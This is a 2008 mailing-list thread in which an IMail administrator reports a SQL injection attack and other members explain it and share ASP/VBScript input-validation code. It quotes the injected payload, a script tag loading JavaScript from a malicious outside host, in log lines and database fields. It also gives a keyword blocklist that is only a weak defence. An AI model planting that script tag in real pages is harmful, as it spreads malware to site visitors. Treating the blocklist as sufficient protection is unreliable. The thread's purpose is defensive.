Re: [IMail Forum] Coldwop

[Matt]

As a follow up to #3, I had to write a quick function for someone today 
that had so many various ORDER BY statements fed through querystring 
that he wanted something generic.  Since SQL injection requires spaces 
or special characters, it is easy to block using a simple function for 
cases where you have ORDER BY and FROM statements, or anywhere else you 
have unquoted strings fed by querystring.  As of last week, the SQL 
injection hacker guy started specifically targeting these ORDER BY 
statements, whereas before he was just targeting quoted string and 
integer data.

   ' #
   
================================================================================================
   #
   ' #
   CleanSQL                                                                                        
   #
   ' #
   
================================================================================================
   #
   ' # Purpose:    Removes strings that contain non-alphanumeric
   characters, periods, underscores and   #
   ' #            
   dashes.                                                                             
   #
   ' # Arguments:  String that is about to be passed to a SQL command
   in unquoted format.               #
   ' # Returns:    Original or blank
   string.                                                            #
   ' #
   
================================================================================================
   #
   Function CleanSQL(strValue)
   Dim regEx
       ' Check for anything but alphanumeric characters and a period,
   underscore and dash.
       Set regEx = New RegExp
       regEx.Global = True
       regEx.IgnoreCase = True
       regEx.Pattern = "^[a-z0-9\._\-]+$"
       If regEx.Test(strValue) = False Then
           CleanSQL = ""
       Else
           CleanSQL = strValue
       End If

       Set regEx = Nothing

   End Function

Matt




Matt wrote:
Kevin,

Trust me when I say, "been there, done that".  Don't do it.  This guy 
will come back and he has more than one trick up his sleve that will 
require you to be perfect.

The process is primarily three steps (mostly echoing Darin):

    1) Do something like CInt to all integers (or other change-to
    numerical data functions) for anything that is stored as a number
    (not a string) in the database.

    2) Escape every single quote with a double single quote for any
    string data going to the database through the query.

    3) For instances such as ORDER BY [column name] and SELECT FROM
    [table name] where you are pulling values from the querystring,
    you must validate that these values are one of the values that you
    are expecting by using a long IF statement or something like
    that.  So if you only have columns named Height, Width, Length,
    you must check that the querystring data only contains one of the
    three.  You could probably also write a function that checks the
    data in regex and verifies that there are no non-alphanumeric
    characters including spaces.  This sort of technique would only
    work for things like ORDER BY, SELECT FROM and don't forget to
    check values like ASC and DESC if you do that sort of thing from
    the querystring also.


Matt



Kevin Rogers wrote:

Thanks for the advice.  Yes, we are running a site that does allow 
access to certain portions of the database, so I'm assuming we got 
hit from that side.  We'll see.  We've added a function to catch the 
injectors to all our web pages in an include file.  Just wondering if 
this would suffice.  (If the function does match, we aren't currently 
doing anything - just ending the page - do you have any suggestions 
in that regard as well?)

pr_ValidateInputAll

function pr_ValidateInputAll()
   dim prReqName
   dim arToCompare
   redim arToCompare(2)
   arToCompare(0) = "drop"
   arToCompare(1) = "delete"
   arToCompare(2) = "update"
   for each prReqName in Request.Form
       pr_ValidateInput Request.Form(prReqName), arToCompare
   next

   for each prReqName in Request.QueryString
       pr_ValidateInput Request.QueryString(prReqName), arToCompare
   next

end function

function pr_ValidateInput(sInput, arToCompare)
   dim nLen, nPos1, nPos2
          nLen = len(sInput)
   if nLen > 15 then
              if Instr(1, sInput, "VARCHAR", 1) > 0 then
           Response.End        end if                  for i = 
lbound(arToCompare) to UBound(arToCompare)                      nPos1 
= InStr(1, sInput, arToCompare(i), 1)
                      if nPos1 > 0 then
               nPos2 = InStr(nPos1 + 1, sInput, "table", 1)         
               if nPos2 > 0 and nPos2 > nPos1  then
                   response.End                end if          
           end if
       next
   end if
end function



Darin Cox wrote:
Best way to find out is to grep all of your web server logs for 
something like "VARCHAR(".  That will tell you what pages are being 
attacked.

After that, you'll have to check the source code of the individual 
pages to see if they are vulnerable, and take appropriate steps to 
patch them (quickly).

Darin.


----- Original Message ----- From: "Matt" <[EMAIL PROTECTED]>
To: <Imail_Forum@list.ipswitch.com>
Sent: Saturday, June 21, 2008 7:06 PM
Subject: Re: [IMail Forum] Coldwop


Oops, I misread this.

You were hacked using SQL injection from the Web side of things.  I'm
not sure what interface was hit, but it could be that webmail is
vulnerable to this.  There's a bunch on SANS about these attacks:


http://www.google.com/search?sourceid=mozclient&ie=utf-8&oe=utf-8&q=sql+injection+site%3Aisc%2Esans%2Eorg 


My guess is that this is Storm Botnet originated stuff.  They hack 
sites
through a very common coding vulnerability in database connected
websites, insert redirection code to an infected site, and when
unsuspecting users visit the intended site, they get infected by means
of one of many vulnerabilities in desktop apps that they target.

Your logs are showing the aftermath of having the bad data in there.
This will continue to happen over and over again until you patch
whatever is vulnerable.  You either have some sort of custom site 
set up
that has access to this particular database, or it was hacked straight
through IMail's Web interfaces.  I would love to know which one.

Matt



Kevin Rogers wrote:
 
Thanks Matt.  I use an external SQL Server for Imail and all my users
had their USERDIR and MAILADDR and TIMEZONE fields changed to include
that coldwop.com javascript (e.g., "someuser" had their USERDIR set to
"d:\imail\someuser<script src=http://www.coldwop.com/b.js></script>")

I've fixed that.  So what you're saying is that you don't think any
passwords have been compromised, but I've just been hit by the SQL
injector attacker?


Matt wrote:
   
This looks exactly like the SQL injection attacker from recent months
is trying to exploit a Postfix flaw by injecting into IMAP
interfaces.  If this is causing you problems, it would seem that
IMail then isn't properly handling this bad data resulting in a
denial of service, though I strongly suspect that you are not
vulnerable otherwise.  It could also be simply curious timing with
two different issues.

Matt



Kevin Rogers wrote:
     
Today our web mail application stopped working.  Some users are
reporting IMAP issues as well.  I've restarted all the services and
rebooted, but that hasn't helped.  The error when entering web mail
is that there is an "illegal character in the path".  When I checked
the syslog, I found thousands of entries like this:
06:21 12:18 SMTP-(4722016d00006d72) ERR MyDomain.com read open fail
(d:\imail\RBG\myuser<script
src=http://www.coldwop.com/b.js></script>\bulk.mbx)
06:21 12:18 SMTP-(46ed01d600006d40) ERR MyDomain.com read open fail
(d:\imail\RBG\myuser<script
src=http://www.coldwop.com/b.js></script>\main.mbx)

Coldwop.com apparently is a malicious site (my Trend Micro won't
even let me go there).  Have I been hacked by them?

Anyone seen this?
I'm running Imail 9.23 on Windows Server 2003, all patches.
Thanks for your help.

Kevin

To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html

        
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html


      
To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html

    


To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive: 
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html


To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive: 
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html


  

To Unsubscribe: http://imailserver.com/support/discussion_list/
List Archive: 
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/
Knowledge Base/FAQ: http://imailserver.com/support/kb.html